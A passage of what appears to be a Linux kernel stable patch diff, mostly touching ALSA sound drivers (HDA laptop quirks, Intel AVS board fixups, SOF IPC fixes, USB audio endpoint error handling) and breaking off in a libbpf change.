+ 	SND_PCI_QUIRK(0x1558, 0x67e5, "Clevo PC70D[PRS](?:-D|-G)?", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+@@ -2651,6 +2652,7 @@ static const struct snd_pci_quirk alc882_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1558, 0x96e1, "Clevo P960[ER][CDFN]-K", ALC1220_FIXUP_CLEVO_P950),
+ 	SND_PCI_QUIRK(0x1558, 0x97e1, "Clevo P970[ER][CDFN]", ALC1220_FIXUP_CLEVO_P950),
+ 	SND_PCI_QUIRK(0x1558, 0x97e2, "Clevo P970RC-M", ALC1220_FIXUP_CLEVO_P950),
++	SND_PCI_QUIRK(0x1558, 0xd502, "Clevo PD50SNE", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK_VENDOR(0x1558, "Clevo laptop", ALC882_FIXUP_EAPD),
+ 	SND_PCI_QUIRK(0x161f, 0x2054, "Medion laptop", ALC883_FIXUP_EAPD),
+ 	SND_PCI_QUIRK(0x17aa, 0x3a0d, "Lenovo Y530", ALC882_FIXUP_LENOVO_Y530),
+@@ -9574,6 +9576,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1558, 0x5101, "Clevo S510WU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x5157, "Clevo W517GU1", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x51a1, "Clevo NS50MU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0x1558, 0x5630, "Clevo NP50RNJS", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x70a1, "Clevo NB70T[HJK]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x70b3, "Clevo NK70SB", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x70f2, "Clevo NH79EPY", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+@@ -9608,6 +9611,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1558, 0x971d, "Clevo N970T[CDF]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xa500, "Clevo NL5[03]RU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xa600, "Clevo NL50NU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0x1558, 0xa671, "Clevo NP70SN[CDE]", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xb018, "Clevo NP50D[BE]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xb019, "Clevo NH77D[BE]Q", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xb022, "Clevo NH77D[DC][QW]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+@@ -9708,6 +9712,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x511e, "Thinkpad", ALC298_FIXUP_TPT470_DOCK),
+ 	SND_PCI_QUIRK(0x17aa, 0x511f, "Thinkpad", ALC298_FIXUP_TPT470_DOCK),
+ 	SND_PCI_QUIRK(0x17aa, 0x9e54, "LENOVO NB", ALC269_FIXUP_LENOVO_EAPD),
++	SND_PCI_QUIRK(0x17aa, 0x9e56, "Lenovo ZhaoYang CF4620Z", ALC286_FIXUP_SONY_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1849, 0x1233, "ASRock NUC Box 1100", ALC233_FIXUP_NO_AUDIO_JACK),
+ 	SND_PCI_QUIRK(0x1849, 0xa233, "Positivo Master C6300", ALC269_FIXUP_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x19e5, 0x3204, "Huawei MACH-WX9", ALC256_FIXUP_HUAWEI_MACH_WX9_PINS),
+diff --git a/sound/pci/ymfpci/ymfpci.c b/sound/pci/ymfpci/ymfpci.c
+index 1e198e4d57b8d..82d4e0fda91be 100644
+--- a/sound/pci/ymfpci/ymfpci.c
++++ b/sound/pci/ymfpci/ymfpci.c
+@@ -170,7 +170,7 @@ static int snd_card_ymfpci_probe(struct pci_dev *pci,
+ 		return -ENOENT;
+ 	}
+ 
+-	err = snd_card_new(&pci->dev, index[dev], id[dev], THIS_MODULE,
++	err = snd_devm_card_new(&pci->dev, index[dev], id[dev], THIS_MODULE,
+ 			   sizeof(*chip), &card);
+ 	if (err < 0)
+ 		return err;
+diff --git a/sound/pci/ymfpci/ymfpci_main.c b/sound/pci/ymfpci/ymfpci_main.c
+index c80114c0ad7bf..b492c32ce0704 100644
+--- a/sound/pci/ymfpci/ymfpci_main.c
++++ b/sound/pci/ymfpci/ymfpci_main.c
+@@ -2165,7 +2165,7 @@ static int snd_ymfpci_memalloc(struct snd_ymfpci *chip)
+ 	chip->work_base = ptr;
+ 	chip->work_base_addr = ptr_addr;
+ 	
+-	snd_BUG_ON(ptr + chip->work_size !=
++	snd_BUG_ON(ptr + PAGE_ALIGN(chip->work_size) !=
+ 		   chip->work_ptr->area + chip->work_ptr->bytes);
+ 
+ 	snd_ymfpci_writel(chip, YDSXGR_PLAYCTRLBASE, chip->bank_base_playback_addr);
+diff --git a/sound/soc/codecs/hdmi-codec.c b/sound/soc/codecs/hdmi-codec.c
+index 74cbbe16f9aec..a22f2ec95901f 100644
+--- a/sound/soc/codecs/hdmi-codec.c
++++ b/sound/soc/codecs/hdmi-codec.c
+@@ -428,8 +428,13 @@ static int hdmi_codec_startup(struct snd_pcm_substream *substream,
+ {
+ 	struct hdmi_codec_priv *hcp = snd_soc_dai_get_drvdata(dai);
+ 	bool tx = substream->stream == SNDRV_PCM_STREAM_PLAYBACK;
++	bool has_capture = !hcp->hcd.no_i2s_capture;
++	bool has_playback = !hcp->hcd.no_i2s_playback;
+ 	int ret = 0;
+ 
++	if (!((has_playback && tx) || (has_capture && !tx)))
++		return 0;
++
+ 	mutex_lock(&hcp->lock);
+ 	if (hcp->busy) {
+ 		dev_err(dai->dev, "Only one simultaneous stream supported!\n");
+@@ -468,6 +473,12 @@ static void hdmi_codec_shutdown(struct snd_pcm_substream *substream,
+ 				struct snd_soc_dai *dai)
+ {
+ 	struct hdmi_codec_priv *hcp = snd_soc_dai_get_drvdata(dai);
++	bool tx = substream->stream == SNDRV_PCM_STREAM_PLAYBACK;
++	bool has_capture = !hcp->hcd.no_i2s_capture;
++	bool has_playback = !hcp->hcd.no_i2s_playback;
++
++	if (!((has_playback && tx) || (has_capture && !tx)))
++		return;
+ 
+ 	hcp->chmap_idx = HDMI_CODEC_CHMAP_IDX_UNKNOWN;
+ 	hcp->hcd.ops->audio_shutdown(dai->dev->parent, hcp->hcd.data);
+diff --git a/sound/soc/codecs/lpass-tx-macro.c b/sound/soc/codecs/lpass-tx-macro.c
+index 2449a2df66df0..8facdb922f076 100644
+--- a/sound/soc/codecs/lpass-tx-macro.c
++++ b/sound/soc/codecs/lpass-tx-macro.c
+@@ -242,7 +242,7 @@ enum {
+ 
+ struct tx_mute_work {
+ 	struct tx_macro *tx;
+-	u32 decimator;
++	u8 decimator;
+ 	struct delayed_work dwork;
+ };
+ 
+@@ -635,7 +635,7 @@ exit:
+ 	return 0;
+ }
+ 
+-static bool is_amic_enabled(struct snd_soc_component *component, int decimator)
++static bool is_amic_enabled(struct snd_soc_component *component, u8 decimator)
+ {
+ 	u16 adc_mux_reg, adc_reg, adc_n;
+ 
+@@ -849,7 +849,7 @@ static int tx_macro_enable_dec(struct snd_soc_dapm_widget *w,
+ 			       struct snd_kcontrol *kcontrol, int event)
+ {
+ 	struct snd_soc_component *component = snd_soc_dapm_to_component(w->dapm);
+-	unsigned int decimator;
++	u8 decimator;
+ 	u16 tx_vol_ctl_reg, dec_cfg_reg, hpf_gate_reg, tx_gain_ctl_reg;
+ 	u8 hpf_cut_off_freq;
+ 	int hpf_delay = TX_MACRO_DMIC_HPF_DELAY_MS;
+@@ -1064,7 +1064,8 @@ static int tx_macro_hw_params(struct snd_pcm_substream *substream,
+ 			      struct snd_soc_dai *dai)
+ {
+ 	struct snd_soc_component *component = dai->component;
+-	u32 decimator, sample_rate;
++	u32 sample_rate;
++	u8 decimator;
+ 	int tx_fs_rate;
+ 	struct tx_macro *tx = snd_soc_component_get_drvdata(component);
+ 
+@@ -1128,7 +1129,7 @@ static int tx_macro_digital_mute(struct snd_soc_dai *dai, int mute, int stream)
+ {
+ 	struct snd_soc_component *component = dai->component;
+ 	struct tx_macro *tx = snd_soc_component_get_drvdata(component);
+-	u16 decimator;
++	u8 decimator;
+ 
+ 	/* active decimator not set yet */
+ 	if (tx->active_decimator[dai->id] == -1)
+diff --git a/sound/soc/intel/avs/boards/da7219.c b/sound/soc/intel/avs/boards/da7219.c
+index acd43b6108e99..1a1d572cc1d02 100644
+--- a/sound/soc/intel/avs/boards/da7219.c
++++ b/sound/soc/intel/avs/boards/da7219.c
+@@ -117,6 +117,26 @@ static void avs_da7219_codec_exit(struct snd_soc_pcm_runtime *rtd)
+ 	snd_soc_component_set_jack(asoc_rtd_to_codec(rtd, 0)->component, NULL, NULL);
+ }
+ 
++static int
++avs_da7219_be_fixup(struct snd_soc_pcm_runtime *runrime, struct snd_pcm_hw_params *params)
++{
++	struct snd_interval *rate, *channels;
++	struct snd_mask *fmt;
++
++	rate = hw_param_interval(params, SNDRV_PCM_HW_PARAM_RATE);
++	channels = hw_param_interval(params, SNDRV_PCM_HW_PARAM_CHANNELS);
++	fmt = hw_param_mask(params, SNDRV_PCM_HW_PARAM_FORMAT);
++
++	/* The ADSP will convert the FE rate to 48k, stereo */
++	rate->min = rate->max = 48000;
++	channels->min = channels->max = 2;
++
++	/* set SSP0 to 24 bit */
++	snd_mask_none(fmt);
++	snd_mask_set_format(fmt, SNDRV_PCM_FORMAT_S24_LE);
++	return 0;
++}
++
+ static int avs_create_dai_link(struct device *dev, const char *platform_name, int ssp_port,
+ 			       struct snd_soc_dai_link **dai_link)
+ {
+@@ -148,6 +168,7 @@ static int avs_create_dai_link(struct device *dev, const char *platform_name, in
+ 	dl->num_platforms = 1;
+ 	dl->id = 0;
+ 	dl->dai_fmt = SND_SOC_DAIFMT_I2S | SND_SOC_DAIFMT_NB_NF | SND_SOC_DAIFMT_CBS_CFS;
++	dl->be_hw_params_fixup = avs_da7219_be_fixup;
+ 	dl->init = avs_da7219_codec_init;
+ 	dl->exit = avs_da7219_codec_exit;
+ 	dl->nonatomic = 1;
+diff --git a/sound/soc/intel/avs/boards/max98357a.c b/sound/soc/intel/avs/boards/max98357a.c
+index 921f42caf7e09..183123d08c5a3 100644
+--- a/sound/soc/intel/avs/boards/max98357a.c
++++ b/sound/soc/intel/avs/boards/max98357a.c
+@@ -8,6 +8,7 @@
+ 
+ #include <linux/module.h>
+ #include <linux/platform_device.h>
++#include <sound/pcm_params.h>
+ #include <sound/soc.h>
+ #include <sound/soc-acpi.h>
+ #include <sound/soc-dapm.h>
+@@ -24,6 +25,26 @@ static const struct snd_soc_dapm_route card_base_routes[] = {
+ 	{ "Spk", NULL, "Speaker" },
+ };
+ 
++static int
++avs_max98357a_be_fixup(struct snd_soc_pcm_runtime *runrime, struct snd_pcm_hw_params *params)
++{
++	struct snd_interval *rate, *channels;
++	struct snd_mask *fmt;
++
++	rate = hw_param_interval(params, SNDRV_PCM_HW_PARAM_RATE);
++	channels = hw_param_interval(params, SNDRV_PCM_HW_PARAM_CHANNELS);
++	fmt = hw_param_mask(params, SNDRV_PCM_HW_PARAM_FORMAT);
++
++	/* The ADSP will convert the FE rate to 48k, stereo */
++	rate->min = rate->max = 48000;
++	channels->min = channels->max = 2;
++
++	/* set SSP0 to 16 bit */
++	snd_mask_none(fmt);
++	snd_mask_set_format(fmt, SNDRV_PCM_FORMAT_S16_LE);
++	return 0;
++}
++
+ static int avs_create_dai_link(struct device *dev, const char *platform_name, int ssp_port,
+ 			       struct snd_soc_dai_link **dai_link)
+ {
+@@ -55,6 +76,7 @@ static int avs_create_dai_link(struct device *dev, const char *platform_name, in
+ 	dl->num_platforms = 1;
+ 	dl->id = 0;
+ 	dl->dai_fmt = SND_SOC_DAIFMT_I2S | SND_SOC_DAIFMT_NB_NF | SND_SOC_DAIFMT_CBS_CFS;
++	dl->be_hw_params_fixup = avs_max98357a_be_fixup;
+ 	dl->nonatomic = 1;
+ 	dl->no_pcm = 1;
+ 	dl->dpcm_playback = 1;
+diff --git a/sound/soc/intel/avs/boards/nau8825.c b/sound/soc/intel/avs/boards/nau8825.c
+index 6731d8a490767..49438a67a77c6 100644
+--- a/sound/soc/intel/avs/boards/nau8825.c
++++ b/sound/soc/intel/avs/boards/nau8825.c
+@@ -33,15 +33,15 @@ avs_nau8825_clock_control(struct snd_soc_dapm_widget *w, struct snd_kcontrol *co
+ 		return -EINVAL;
+ 	}
+ 
+-	if (!SND_SOC_DAPM_EVENT_ON(event)) {
++	if (SND_SOC_DAPM_EVENT_ON(event))
++		ret = snd_soc_dai_set_sysclk(codec_dai, NAU8825_CLK_MCLK, 24000000,
++					     SND_SOC_CLOCK_IN);
++	else
+ 		ret = snd_soc_dai_set_sysclk(codec_dai, NAU8825_CLK_INTERNAL, 0, SND_SOC_CLOCK_IN);
+-		if (ret < 0) {
+-			dev_err(card->dev, "set sysclk err = %d\n", ret);
+-			return ret;
+-		}
+-	}
++	if (ret < 0)
++		dev_err(card->dev, "Set sysclk failed: %d\n", ret);
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ static const struct snd_kcontrol_new card_controls[] = {
+diff --git a/sound/soc/intel/avs/boards/rt5682.c b/sound/soc/intel/avs/boards/rt5682.c
+index 473e9fe5d0bf7..b2c2ba93dcb56 100644
+--- a/sound/soc/intel/avs/boards/rt5682.c
++++ b/sound/soc/intel/avs/boards/rt5682.c
+@@ -169,6 +169,27 @@ static const struct snd_soc_ops avs_rt5682_ops = {
+ 	.hw_params = avs_rt5682_hw_params,
+ };
+ 
++static int
++avs_rt5682_be_fixup(struct snd_soc_pcm_runtime *runtime, struct snd_pcm_hw_params *params)
++{
++	struct snd_interval *rate, *channels;
++	struct snd_mask *fmt;
++
++	rate = hw_param_interval(params, SNDRV_PCM_HW_PARAM_RATE);
++	channels = hw_param_interval(params, SNDRV_PCM_HW_PARAM_CHANNELS);
++	fmt = hw_param_mask(params, SNDRV_PCM_HW_PARAM_FORMAT);
++
++	/* The ADSP will convert the FE rate to 48k, stereo */
++	rate->min = rate->max = 48000;
++	channels->min = channels->max = 2;
++
++	/* set SSPN to 24 bit */
++	snd_mask_none(fmt);
++	snd_mask_set_format(fmt, SNDRV_PCM_FORMAT_S24_LE);
++
++	return 0;
++}
++
+ static int avs_create_dai_link(struct device *dev, const char *platform_name, int ssp_port,
+ 			       struct snd_soc_dai_link **dai_link)
+ {
+@@ -201,6 +222,7 @@ static int avs_create_dai_link(struct device *dev, const char *platform_name, in
+ 	dl->id = 0;
+ 	dl->init = avs_rt5682_codec_init;
+ 	dl->exit = avs_rt5682_codec_exit;
++	dl->be_hw_params_fixup = avs_rt5682_be_fixup;
+ 	dl->ops = &avs_rt5682_ops;
+ 	dl->nonatomic = 1;
+ 	dl->no_pcm = 1;
+diff --git a/sound/soc/intel/avs/boards/ssm4567.c b/sound/soc/intel/avs/boards/ssm4567.c
+index c5db696127624..2b7f5ad92aca7 100644
+--- a/sound/soc/intel/avs/boards/ssm4567.c
++++ b/sound/soc/intel/avs/boards/ssm4567.c
+@@ -15,7 +15,6 @@
+ #include <sound/soc-acpi.h>
+ #include "../../../codecs/nau8825.h"
+ 
+-#define SKL_NUVOTON_CODEC_DAI	"nau8825-hifi"
+ #define SKL_SSM_CODEC_DAI	"ssm4567-hifi"
+ 
+ static struct snd_soc_codec_conf card_codec_conf[] = {
+@@ -34,41 +33,11 @@ static const struct snd_kcontrol_new card_controls[] = {
+ 	SOC_DAPM_PIN_SWITCH("Right Speaker"),
+ };
+ 
+-static int
+-platform_clock_control(struct snd_soc_dapm_widget *w, struct snd_kcontrol *control, int event)
+-{
+-	struct snd_soc_dapm_context *dapm = w->dapm;
+-	struct snd_soc_card *card = dapm->card;
+-	struct snd_soc_dai *codec_dai;
+-	int ret;
+-
+-	codec_dai = snd_soc_card_get_codec_dai(card, SKL_NUVOTON_CODEC_DAI);
+-	if (!codec_dai) {
+-		dev_err(card->dev, "Codec dai not found\n");
+-		return -EINVAL;
+-	}
+-
+-	if (SND_SOC_DAPM_EVENT_ON(event)) {
+-		ret = snd_soc_dai_set_sysclk(codec_dai, NAU8825_CLK_MCLK, 24000000,
+-					     SND_SOC_CLOCK_IN);
+-		if (ret < 0)
+-			dev_err(card->dev, "set sysclk err = %d\n", ret);
+-	} else {
+-		ret = snd_soc_dai_set_sysclk(codec_dai, NAU8825_CLK_INTERNAL, 0, SND_SOC_CLOCK_IN);
+-		if (ret < 0)
+-			dev_err(card->dev, "set sysclk err = %d\n", ret);
+-	}
+-
+-	return ret;
+-}
+-
+ static const struct snd_soc_dapm_widget card_widgets[] = {
+ 	SND_SOC_DAPM_SPK("Left Speaker", NULL),
+ 	SND_SOC_DAPM_SPK("Right Speaker", NULL),
+ 	SND_SOC_DAPM_SPK("DP1", NULL),
+ 	SND_SOC_DAPM_SPK("DP2", NULL),
+-	SND_SOC_DAPM_SUPPLY("Platform Clock", SND_SOC_NOPM, 0, 0, platform_clock_control,
+-			    SND_SOC_DAPM_PRE_PMU | SND_SOC_DAPM_POST_PMD),
+ };
+ 
+ static const struct snd_soc_dapm_route card_base_routes[] = {
+diff --git a/sound/soc/sof/intel/hda-ctrl.c b/sound/soc/sof/intel/hda-ctrl.c
+index 3aea36c077c9d..f3bdeba284122 100644
+--- a/sound/soc/sof/intel/hda-ctrl.c
++++ b/sound/soc/sof/intel/hda-ctrl.c
+@@ -196,12 +196,15 @@ int hda_dsp_ctrl_init_chip(struct snd_sof_dev *sdev)
+ 		goto err;
+ 	}
+ 
++	usleep_range(500, 1000);
++
+ 	/* exit HDA controller reset */
+ 	ret = hda_dsp_ctrl_link_reset(sdev, false);
+ 	if (ret < 0) {
+ 		dev_err(sdev->dev, "error: failed to exit HDA controller reset\n");
+ 		goto err;
+ 	}
++	usleep_range(1000, 1200);
+ 
+ 	hda_codec_detect_mask(sdev);
+ 
+diff --git a/sound/soc/sof/intel/hda-dsp.c b/sound/soc/sof/intel/hda-dsp.c
+index b4eacae8564c8..6b2094f74c9c0 100644
+--- a/sound/soc/sof/intel/hda-dsp.c
++++ b/sound/soc/sof/intel/hda-dsp.c
+@@ -399,6 +399,12 @@ static int hda_dsp_update_d0i3c_register(struct snd_sof_dev *sdev, u8 value)
+ 	snd_sof_dsp_update8(sdev, HDA_DSP_HDA_BAR, chip->d0i3_offset,
+ 			    SOF_HDA_VS_D0I3C_I3, value);
+ 
++	/*
++	 * The value written to the D0I3C::I3 bit may not be taken into account immediately.
++	 * A delay is recommended before checking if D0I3C::CIP is cleared
++	 */
++	usleep_range(30, 40);
++
+ 	/* Wait for cmd in progress to be cleared before exiting the function */
+ 	ret = hda_dsp_wait_d0i3c_done(sdev);
+ 	if (ret < 0) {
+@@ -407,6 +413,12 @@ static int hda_dsp_update_d0i3c_register(struct snd_sof_dev *sdev, u8 value)
+ 	}
+ 
+ 	reg = snd_sof_dsp_read8(sdev, HDA_DSP_HDA_BAR, chip->d0i3_offset);
++	/* Confirm d0i3 state changed with paranoia check */
++	if ((reg ^ value) & SOF_HDA_VS_D0I3C_I3) {
++		dev_err(sdev->dev, "failed to update D0I3C!\n");
++		return -EIO;
++	}
++
+ 	trace_sof_intel_D0I3C_updated(sdev, reg);
+ 
+ 	return 0;
+diff --git a/sound/soc/sof/intel/pci-tng.c b/sound/soc/sof/intel/pci-tng.c
+index 5b2b409752c58..8c22a00266c06 100644
+--- a/sound/soc/sof/intel/pci-tng.c
++++ b/sound/soc/sof/intel/pci-tng.c
+@@ -75,11 +75,7 @@ static int tangier_pci_probe(struct snd_sof_dev *sdev)
+ 
+ 	/* LPE base */
+ 	base = pci_resource_start(pci, desc->resindex_lpe_base) - IRAM_OFFSET;
+-	size = pci_resource_len(pci, desc->resindex_lpe_base);
+-	if (size < PCI_BAR_SIZE) {
+-		dev_err(sdev->dev, "error: I/O region is too small.\n");
+-		return -ENODEV;
+-	}
++	size = PCI_BAR_SIZE;
+ 
+ 	dev_dbg(sdev->dev, "LPE PHY base at 0x%x size 0x%x", base, size);
+ 	sdev->bar[DSP_BAR] = devm_ioremap(sdev->dev, base, size);
+diff --git a/sound/soc/sof/ipc3.c b/sound/soc/sof/ipc3.c
+index 1fef4dcc09368..fde8af5a1f485 100644
+--- a/sound/soc/sof/ipc3.c
++++ b/sound/soc/sof/ipc3.c
+@@ -970,8 +970,9 @@ static void sof_ipc3_rx_msg(struct snd_sof_dev *sdev)
+ 		return;
+ 	}
+ 
+-	if (hdr.size < sizeof(hdr)) {
+-		dev_err(sdev->dev, "The received message size is invalid\n");
++	if (hdr.size < sizeof(hdr) || hdr.size > SOF_IPC_MSG_MAX_SIZE) {
++		dev_err(sdev->dev, "The received message size is invalid: %u\n",
++			hdr.size);
+ 		return;
+ 	}
+ 
+diff --git a/sound/soc/sof/ipc4-control.c b/sound/soc/sof/ipc4-control.c
+index 0d5a578c34962..7442ec1c5a4d4 100644
+--- a/sound/soc/sof/ipc4-control.c
++++ b/sound/soc/sof/ipc4-control.c
+@@ -84,7 +84,8 @@ sof_ipc4_set_volume_data(struct snd_sof_dev *sdev, struct snd_sof_widget *swidge
+ 		}
+ 
+ 		/* set curve type and duration from topology */
+-		data.curve_duration = gain->data.curve_duration;
++		data.curve_duration_l = gain->data.curve_duration_l;
++		data.curve_duration_h = gain->data.curve_duration_h;
+ 		data.curve_type = gain->data.curve_type;
+ 
+ 		msg->data_ptr = &data;
+diff --git a/sound/soc/sof/ipc4-topology.c b/sound/soc/sof/ipc4-topology.c
+index 59f4d42f9011e..6da6137fa2cbc 100644
+--- a/sound/soc/sof/ipc4-topology.c
++++ b/sound/soc/sof/ipc4-topology.c
+@@ -107,7 +107,7 @@ static const struct sof_topology_token gain_tokens[] = {
+ 		get_token_u32, offsetof(struct sof_ipc4_gain_data, curve_type)},
+ 	{SOF_TKN_GAIN_RAMP_DURATION,
+ 		SND_SOC_TPLG_TUPLE_TYPE_WORD, get_token_u32,
+-		offsetof(struct sof_ipc4_gain_data, curve_duration)},
++		offsetof(struct sof_ipc4_gain_data, curve_duration_l)},
+ 	{SOF_TKN_GAIN_VAL, SND_SOC_TPLG_TUPLE_TYPE_WORD,
+ 		get_token_u32, offsetof(struct sof_ipc4_gain_data, init_val)},
+ };
+@@ -155,7 +155,7 @@ static void sof_ipc4_dbg_audio_format(struct device *dev,
+ 	for (i = 0; i < num_format; i++, ptr = (u8 *)ptr + object_size) {
+ 		fmt = ptr;
+ 		dev_dbg(dev,
+-			" #%d: %uKHz, %ubit (ch_map %#x ch_cfg %u interleaving_style %u fmt_cfg %#x)\n",
++			" #%d: %uHz, %ubit (ch_map %#x ch_cfg %u interleaving_style %u fmt_cfg %#x)\n",
+ 			i, fmt->sampling_frequency, fmt->bit_depth, fmt->ch_map,
+ 			fmt->ch_cfg, fmt->interleaving_style, fmt->fmt_cfg);
+ 	}
+@@ -670,7 +670,7 @@ static int sof_ipc4_widget_setup_comp_pga(struct snd_sof_widget *swidget)
+ 
+ 	dev_dbg(scomp->dev,
+ 		"pga widget %s: ramp type: %d, ramp duration %d, initial gain value: %#x, cpc %d\n",
+-		swidget->widget->name, gain->data.curve_type, gain->data.curve_duration,
++		swidget->widget->name, gain->data.curve_type, gain->data.curve_duration_l,
+ 		gain->data.init_val, gain->base_config.cpc);
+ 
+ 	ret = sof_ipc4_widget_setup_msg(swidget, &gain->msg);
+diff --git a/sound/soc/sof/ipc4-topology.h b/sound/soc/sof/ipc4-topology.h
+index 2363a7cc0b57d..cf9d278524572 100644
+--- a/sound/soc/sof/ipc4-topology.h
++++ b/sound/soc/sof/ipc4-topology.h
+@@ -217,14 +217,16 @@ struct sof_ipc4_control_data {
+  * @init_val: Initial value
+  * @curve_type: Curve type
+  * @reserved: reserved for future use
+- * @curve_duration: Curve duration
++ * @curve_duration_l: Curve duration low part
++ * @curve_duration_h: Curve duration high part
+  */
+ struct sof_ipc4_gain_data {
+ 	uint32_t channels;
+ 	uint32_t init_val;
+ 	uint32_t curve_type;
+ 	uint32_t reserved;
+-	uint32_t curve_duration;
++	uint32_t curve_duration_l;
++	uint32_t curve_duration_h;
+ } __aligned(8);
+ 
+ /**
+diff --git a/sound/usb/endpoint.c b/sound/usb/endpoint.c
+index 419302e2057e8..647fa054d8b1d 100644
+--- a/sound/usb/endpoint.c
++++ b/sound/usb/endpoint.c
+@@ -455,8 +455,8 @@ static void push_back_to_ready_list(struct snd_usb_endpoint *ep,
+  * This function is used both for implicit feedback endpoints and in low-
+  * latency playback mode.
+  */
+-void snd_usb_queue_pending_output_urbs(struct snd_usb_endpoint *ep,
+-				       bool in_stream_lock)
++int snd_usb_queue_pending_output_urbs(struct snd_usb_endpoint *ep,
++				      bool in_stream_lock)
+ {
+ 	bool implicit_fb = snd_usb_endpoint_implicit_feedback_sink(ep);
+ 
+@@ -480,7 +480,7 @@ void snd_usb_queue_pending_output_urbs(struct snd_usb_endpoint *ep,
+ 		spin_unlock_irqrestore(&ep->lock, flags);
+ 
+ 		if (ctx == NULL)
+-			return;
++			break;
+ 
+ 		/* copy over the length information */
+ 		if (implicit_fb) {
+@@ -495,11 +495,14 @@ void snd_usb_queue_pending_output_urbs(struct snd_usb_endpoint *ep,
+ 			break;
+ 		if (err < 0) {
+ 			/* push back to ready list again for -EAGAIN */
+-			if (err == -EAGAIN)
++			if (err == -EAGAIN) {
+ 				push_back_to_ready_list(ep, ctx);
+-			else
++				break;
++			}
++
++			if (!in_stream_lock)
+ 				notify_xrun(ep);
+-			return;
++			return -EPIPE;
+ 		}
+ 
+ 		err = usb_submit_urb(ctx->urb, GFP_ATOMIC);
+@@ -507,13 +510,16 @@ void snd_usb_queue_pending_output_urbs(struct snd_usb_endpoint *ep,
+ 			usb_audio_err(ep->chip,
+ 				      "Unable to submit urb #%d: %d at %s\n",
+ 				      ctx->index, err, __func__);
+-			notify_xrun(ep);
+-			return;
++			if (!in_stream_lock)
++				notify_xrun(ep);
++			return -EPIPE;
+ 		}
+ 
+ 		set_bit(ctx->index, &ep->active_mask);
+ 		atomic_inc(&ep->submitted_urbs);
+ 	}
++
++	return 0;
+ }
+ 
+ /*
+diff --git a/sound/usb/endpoint.h b/sound/usb/endpoint.h
+index 924f4351588ce..c09f68ce08b18 100644
+--- a/sound/usb/endpoint.h
++++ b/sound/usb/endpoint.h
+@@ -52,7 +52,7 @@ int snd_usb_endpoint_implicit_feedback_sink(struct snd_usb_endpoint *ep);
+ int snd_usb_endpoint_next_packet_size(struct snd_usb_endpoint *ep,
+ 				      struct snd_urb_ctx *ctx, int idx,
+ 				      unsigned int avail);
+-void snd_usb_queue_pending_output_urbs(struct snd_usb_endpoint *ep,
+-				       bool in_stream_lock);
++int snd_usb_queue_pending_output_urbs(struct snd_usb_endpoint *ep,
++				      bool in_stream_lock);
+ 
+ #endif /* __USBAUDIO_ENDPOINT_H */
+diff --git a/sound/usb/format.c b/sound/usb/format.c
+index 405dc0bf6678c..4b1c5ba121f39 100644
+--- a/sound/usb/format.c
++++ b/sound/usb/format.c
+@@ -39,8 +39,12 @@ static u64 parse_audio_format_i_type(struct snd_usb_audio *chip,
+ 	case UAC_VERSION_1:
+ 	default: {
+ 		struct uac_format_type_i_discrete_descriptor *fmt = _fmt;
+-		if (format >= 64)
+-			return 0; /* invalid format */
++		if (format >= 64) {
++			usb_audio_info(chip,
++				       "%u:%d: invalid format type 0x%llx is detected, processed as PCM\n",
++				       fp->iface, fp->altsetting, format);
++			format = UAC_FORMAT_TYPE_I_PCM;
++		}
+ 		sample_width = fmt->bBitResolution;
+ 		sample_bytes = fmt->bSubframeSize;
+ 		format = 1ULL << format;
+diff --git a/sound/usb/pcm.c b/sound/usb/pcm.c
+index d959da7a1afba..eec5232f9fb29 100644
+--- a/sound/usb/pcm.c
++++ b/sound/usb/pcm.c
+@@ -1639,7 +1639,7 @@ static int snd_usb_pcm_playback_ack(struct snd_pcm_substream *substream)
+ 	 * outputs here
+ 	 */
+ 	if (!ep->active_mask)
+-		snd_usb_queue_pending_output_urbs(ep, true);
++		return snd_usb_queue_pending_output_urbs(ep, true);
+ 	return 0;
+ }
+ 
+diff --git a/tools/lib/bpf/btf_dump.c b/tools/lib/bpf/btf_dump.c
+index 69e80ee5f70e2..cfbec31e115cc 100644
+--- a/tools/lib/bpf/btf_dump.c
++++ b/tools/lib/bpf/btf_dump.c
+@@ -833,14 +833,9 @@ static bool btf_is_struct_packed(const struct btf *btf, __u32 id,
+ 				 const struct btf_type *t)
+ {
+ 	const struct btf_member *m;
+-	int align, i, bit_sz;
++	int max_align = 1, align, i, bit_sz;
+ 	__u16 vlen;
+ 
+-	align = btf__align_of(btf, id);
+-	/* size of a non-packed struct has to be a multiple of its alignment*/
+-	if (align && t->size % align)
+-		return true;
+-
+ 	m = btf_members(t);
